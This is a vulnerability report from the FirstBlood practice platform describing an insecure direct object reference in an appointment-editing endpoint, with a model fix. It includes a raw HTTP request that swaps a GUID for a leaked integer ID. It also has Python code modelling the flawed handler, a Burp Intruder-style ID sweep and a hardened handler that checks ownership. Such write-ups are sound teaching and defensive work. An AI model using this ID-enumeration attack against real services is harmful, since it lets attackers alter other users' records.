FirstBlood-#127 — IDOR on ma.php
This issue was discovered on FirstBlood v1
On 2021-05-10, jpdev Level 3 reported:
Summary
The manage appointments API allows for the use of integer values by capturing the request within Burp and amending the GUID to its integer ID. This ID can be found on the index page of the drpanel, within the source of the page, in the getinfo function call.
Request
POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49335
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 24
Origin: http://firstbloodhackers.com:49335
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49335/manageappointment.php?success&aptid=81435813-e40a-411d-af19-6e2d89963493
Cookie: drps=62f02a3467fff377e02116e10
message=test&id=56911904
Impact
A malicious user can now use Burp Intruder to amend all appointments, removing potentially key notes.
P2 High
Endpoint: /api/ma.php
Parameter: id=
Payload: 56911904
FirstBlood ID: 6
Vulnerability Type: Insecure direct object reference
The endpoint ma.php (used to modify an appointment) accepts a plain integer ID as well as the GUID when modifying appointments. The GUID was relied on as the only barrier, which is security through obscurity: the integer ID is exposed in the drpanel page source and is trivially enumerable, and the endpoint performs no check that the appointment belongs to the logged-in account.
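To make the fix concrete, the following is an added Python model of the handler; it is example code written for this page, not FirstBlood's own ma.php source, which is not shown here. It assumes an in-memory store with a per-appointment owning doctor (the `doctor` field is an assumption; the page does not show the schema). The first integer ID and GUID are taken from the report's request, the second row and the doctor names are constructed. The weak handler matches either identifier and writes without an ownership check; `intruder_sweep` shows what an integer Intruder payload achieves against it; the hardened handler requires a canonical GUID and, more importantly, checks ownership against the session.

```python
import uuid
from dataclasses import dataclass
from typing import List


@dataclass
class Appointment:
    int_id: int   # database row id, leaked in the drpanel page source per the report
    guid: str     # the aptid the UI passes around
    doctor: str   # owning drpanel account (assumed field, not shown on the page)
    message: str


def make_store() -> List[Appointment]:
    """Constructed sample data. The first id/GUID pair is copied from the
    report's request; the second row and the doctor names are made up."""
    return [
        Appointment(56911904, "81435813-e40a-411d-af19-6e2d89963493",
                    "drjones", "bring previous scans"),
        Appointment(56911905, "3c2d1a0e-7b4f-4c9d-8e1a-2f5b6c7d8e9f",
                    "drsmith", "allergic to penicillin"),
    ]


def ma_vulnerable(store, session_doctor, apt_id, message):
    """Models the reported ma.php behaviour: `id` matches either the GUID or
    the bare integer row id, and session_doctor is never consulted before
    the row is overwritten."""
    for apt in store:
        if apt_id == apt.guid or apt_id == str(apt.int_id):
            apt.message = message
            return "updated"
    return "not found"


def intruder_sweep(store, session_doctor, start, count, message):
    """What a Burp Intruder numeric payload achieves against the weak handler:
    walk a contiguous id range and return every id that was overwritten."""
    return [i for i in range(start, start + count)
            if ma_vulnerable(store, session_doctor, str(i), message) == "updated"]


def ma_hardened(store, session_doctor, apt_id, message):
    """Fixed handler. The id must be a canonical GUID (rejecting the integer
    form removes the enumerable identifier), and the appointment must belong
    to the doctor tied to the session (the check that actually closes the IDOR)."""
    try:
        canonical = str(uuid.UUID(apt_id))
    except (ValueError, AttributeError, TypeError):
        return "invalid id"
    if canonical != apt_id.lower():   # e.g. braces or undashed hex
        return "invalid id"
    for apt in store:
        if apt.guid == canonical:
            if apt.doctor != session_doctor:
                return "forbidden"
            apt.message = message
            return "updated"
    return "not found"


if __name__ == "__main__":
    store = make_store()
    # drsmith overwrites drjones's appointment using only the leaked integer
    print(ma_vulnerable(store, "drsmith", "56911904", "test"))
    print(intruder_sweep(make_store(), "drsmith", 56911900, 10, "wiped"))
    store = make_store()
    print(ma_hardened(store, "drsmith", "56911904", "test"))
    print(ma_hardened(store, "drsmith", store[0].guid, "test"))
    print(ma_hardened(store, "drjones", store[0].guid, "test"))
```

Note that the GUID check alone would not have been enough: an attacker who obtains another doctor's GUID (for example from a shared link like the Referer in the report) would still be able to modify it, so the ownership comparison is the part of the fix that matters.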